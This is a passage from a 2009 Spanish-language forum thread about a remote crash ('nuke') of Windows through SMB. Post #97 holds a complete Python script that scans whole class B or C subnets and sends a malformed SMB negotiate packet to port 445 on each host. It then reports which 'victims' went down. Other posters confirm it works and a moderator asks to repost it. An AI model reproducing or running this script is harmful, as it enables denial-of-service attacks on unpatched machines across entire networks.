Nuke a Windows. Cuelga tu sistema de nuevo • Hardware y software • MediaVida.com

mTh: online

#91 9 sep 09, 17:36

#90

Más que una queja ha sido un llamamiento... y por lo que se ve ha funcionado. Es la primera vez desde que escribo de manera habitual en asuntos de este tipo en el que un moderador se pone a ocultar post en el foro de software (Bien es cierto que antes al foro de software libre se le prestaba menos atención que a otros y que ahora esta todo más arrejuntado, pero aun así, clap, clap, clap).

Respecto a tu post, en mi opinión no es tan solo cuestión de "costumbre" como pareces indicar (Aunque a lo mejor es una falsa impresión)... Conseguir permisos en windows es un juego de niños y tienes que recurrir a soluciones específicas de cada amenaza para evitar los ataques, mientras que en linux solo se puede conseguir usando citados exploits...

A mi eso me parece más fundamental, una cuestión de base vamos, que simplemente decir "Es que lo normal en windows es usar administrador y en linux no"... digamos que es una capa de defensa más, aunque por supuesto no es perfecta.

Mensaje editado 2 veces. Última edición 9 sep 09, 17:43

Top

Loa: Moderador

#92 9 sep 09, 17:43

#91 yo antes no era moderador de software libre... y tampoco voy a tirar piedras contra mi propio tejado (se me entiende...) pero mas de uno por aqui se ha llevado su desayuno con racion doble...

como he comentado... en este foro no están permitidos los insultos, en cuanto a las discusiones, como si queréis pensar que el agua no moja

por lo otro, esta claro que no todo se reduce a ello, pero te digo como administrador de maquinass windows y linux que hay muy malas costumbres en windows

Top

guner

#93 9 sep 09, 18:35

Yo fui el que se dejó nukear por erdanblo. Firewall de windows off, servicio para compartir archivos e impresoras encendido.

Windows 7 Build 7100. al día de actualizaciones.

Top

PlrA

#94 9 sep 09, 18:56

Pues yo lo he vuelto a intentar varias veces con el **** phy y nada, como ya he dicho, de RTM ultimate ES nativo a RC7264 y viceversa, nada de nada.

Top

QueTzaL

#95 9 sep 09, 19:06

#93 Pos eso, 7100

Top

S1L3nCe

#96 9 sep 09, 19:30

#92 CHOCOPUNTOOOOS! xD

Top

MaKi

#97 9 sep 09, 20:20

Bueno el AnuBis me ha picado y llevo como 2 o 3 horas programando xD
He hecho un script, para redes de tipo, B, C y ip único, además hago uso de 200 hilos para evitar las esperas de I/O. Ahora si que compruebo, si el host sigue vivo o no.

Ni me ha dado tiempo a probarlo, pero debería funcionar, codigo fuente:

Spoiler


#!/usr/bin/python
# -*- coding: utf-8 -*-
# vim: set fileencoding=utf-8 :
# Blog:   http://blogricardo.wordpress.com/
# Hecho Ricardo Marmolejo García <makiolo@gmail.com>
# Basado en el exploit de Laurent Gaffié
# Ultimo cambio : miércoles, 10 de septiembre de 2009 12:30
# Licencia: Creative Commons License Deed: Reconocimiento-No comercial-Compartir bajo la misma licencia 3.0 (   http://blogricardo.wordpress.com/licencia/ )

import time
import sys
import threading
from threading import Thread
from Queue import Queue
from socket import socket
from time import sleep

# configuracion
NUM_THREADS = 50
DEBUG = True
TIPO_RED = 'C'                                           # Tipo: 'B', 'C' o '1'

RED_UNICO = '192.168.1.4'
RED_C = "192.168.1.%d"
RED_B = "192.168.%d.%d"

class Pool:
    def __init__(self , numHilos):
        self.cola = Queue()
        self.numHilos = numHilos
        self.lock = False
        self.interrumpido = False
        self.numTrabajos = 0

    def intentarEmpezarTrabajo(self , cola , idWorker , *args):
        while not self.interrumpido:
            if (self.numTrabajos > 0):
                elemento = cola.get()
                self.ejecutar(idWorker , elemento , *args)
                cola.task_done()
                self.numTrabajos -= 1
            else:
                # comprueba si hay tareas cada cierto tiempo
                time.sleep(0.5)
                
    def estaOcupado(self):
        return self.numTrabajos > 0

    def nuevoElemento(self, elemento):
        self.numTrabajos += 1
        self.cola.put(elemento)

    def empezar(self , args=None):
        if not self.lock:
            self.lock = True

            for idWorker in range(self.numHilos):

                lista_args = []
                lista_args.append( self.cola )
                lista_args.append( idWorker )
                if args != None:
                    for arg in args:
                        lista_args.append( arg )

                worker = Thread(target=self.intentarEmpezarTrabajo, args=lista_args )
                worker.setDaemon(True)
                worker.start()

            # aqui se bloquea hasta que termine
            self.cola.join()

            self.lock = False

    def esLock(self):
        return self.lock

    # metodo para sobreescribir
    def ejecutar(self , idWorker , elemento , *arg):
        print "Debes sobreescribir el método"
        raise NotImplementedError

    def interrumpir(self):
        self.interrumpido = True

# herencia multiple
class PoolNukers(Pool , Thread):
    
    def __init__(self, numHilos, listaVictimasExito, listaVictimasFracaso):
        Pool.__init__(self , numHilos)
        Thread.__init__(self)        
        self.numHilos = numHilos
        self.listaVictimasExito = listaVictimasExito
        self.listaVictimasFracaso = listaVictimasFracaso
        self.TIMEOUT = 10
        self.puerto = 445
        self.buff = (
            "\x00\x00\x00\x90" # Begin SMB header: Session message
            "\xff\x53\x4d\x42" # Server Component: SMB
            "\x72\x00\x00\x00" # Negociate Protocol
            "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
            "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
            "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
            "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
            "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
            "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
            "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
            "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
            "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
            "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
            "\x30\x30\x32\x00"
        )
    
    # cuando el hilo empieza -> empieza la pool de 200 cuervos
    def run(self):
        self.empezar( args=(self.listaVictimasExito,listaVictimasFracaso,) )

    def nuevaVictima(self, victima):
        self.nuevoElemento(victima)
        
    def ejecutar(self , numHilo , victima, listaVictimasExito, listaVictimasFracaso):
        
        def estaVivo(victima, puerto):
            try:
                s = socket()
                s.settimeout(3*self.TIMEOUT)
                s.connect((victima,puerto))
                s.send(self.buff)
                s.close()
                return True
            except:
                return False

        try:
            if DEBUG:
                print "Conectando con %s, (timeout de %d segs)" % (victima, self.TIMEOUT)
            s = socket()
            s.settimeout(self.TIMEOUT)
            s.connect((victima,self.puerto))
            if DEBUG:
                print "Enviando cadena a %s" % victima
            s.send(self.buff)
            s.close()
            
            # Comprobar si sigue vivo
            if DEBUG:
                print "%s ha sido atacado, comrpobando si sigue vivo" % victima

            # le dejamos tiempo para morir
            sleep(10)

            if not estaVivo(victima, self.puerto):
                listaVictimasExito.append(victima)
                if DEBUG:
                    print "Posible exito con %s !!!" % victima
            else:
                listaVictimasFracaso.append(victima)
        except:
            if DEBUG:
                print "Error enviando la cadena a %s" % victima

listaVictimasExito = []
listaVictimasFracaso = []

poolNukers = PoolNukers(NUM_THREADS, listaVictimasExito, listaVictimasFracaso)
if TIPO_RED == 'B':

    # RED TIPO B
    cont = 0
    for i in range(254):
        for j in range(254):
            host = RED_B % (i+1, j+1)
            poolNukers.nuevaVictima(host)
            cont += 1
elif TIPO_RED == 'C':

    # RED TIPO C
    cont = 0
    for i in range(254):
        host = RED_C % (i+1)
        poolNukers.nuevaVictima(host)
        cont += 1
else:

    # 1 única victima
    cont = 1
    poolNukers.nuevaVictima(RED_UNICO)

print "%d victimas potenciales" % cont
poolNukers.start()
poolNukers.join()

if len(listaVictimasExito) > 0:
    print "\n\nHost atacados y PETADOS"
    print "---------------------------------------------"
    for victima in listaVictimasExito:
         print "%s ha petado ;D" % victima
else:
    print "No se ha petado ninguna victima ;("

if len(listaVictimasFracaso) > 0:
    print "\n\nHost atacados pero continuan en pie"
    print "---------------------------------------------"
    for victima in listaVictimasFracaso:
         print "%s sigue en pie ;(" % victima

Lo he publicado en mi blog, hay lo actualizaré si encuentro algún bug:
http://blogricardo.wordpress.com/20...dows-vista-2008/

Mensaje editado 5 veces. Última edición 10 sep 09, 12:38

Top

aNuBiS

#98 9 sep 09, 22:39

#97 Menuda currada !! Lo mio era muy ridiculo

.

Por cierto, LOA creo que va siendo de rigor que cambies el titulo del Thread y que #1 se actualice y ponga la lista de sistemas afectados ahora que se sabe que W7 NO esta afectado

.

Top

_oip_

#99 10 sep 09, 00:34

#97 : Pon el encoding antes del nombre, que si no peta xD (por lo menos a mí). En mi caso, mi hermano tiene XP que no sé si petará, hace el ataque pero no peta vamos xDD

Mensaje editado 1 vez. Última edición 10 sep 09, 00:41

Top

Loa: Moderador

#100 10 sep 09, 08:49

editado en #1

#97 permiso para C&P tu codigo en #1 ??

Top

erdanblo: online

#101 10 sep 09, 10:44

Algunos sois muy cabezotas.

Top

MaKi

#102 10 sep 09, 11:15

#100 , tienes permiso ofc pero espera un poco que la gente diga que funciona y eso, desde #1 , no puedo actualizar ;P, a mi en linux me funciona pero en windows me da problemas (seguramente por versión de python).

Edit1: ya me funciona en, win, tenía 2 versiones de python, no obstante, necesita un cambio

Edit2: ok #103 , pues ya puedes editar, probado en win y parece que funciona, pero no tengo ningún vista k petar. Eso si, si la red que se prueba esta algo petada, o la pool es de demasiados hilos, puedo advertir de haber petado maquinas siendo falso.

Mensaje editado 3 veces. Última edición 10 sep 09, 12:44

Top

erdanblo: online

#103 10 sep 09, 11:18

Te edito yo. Total para un post mio que supera la 1º página.

Top

Loa: Moderador

#104 10 sep 09, 12:27

no me seas victima #103 xD

Top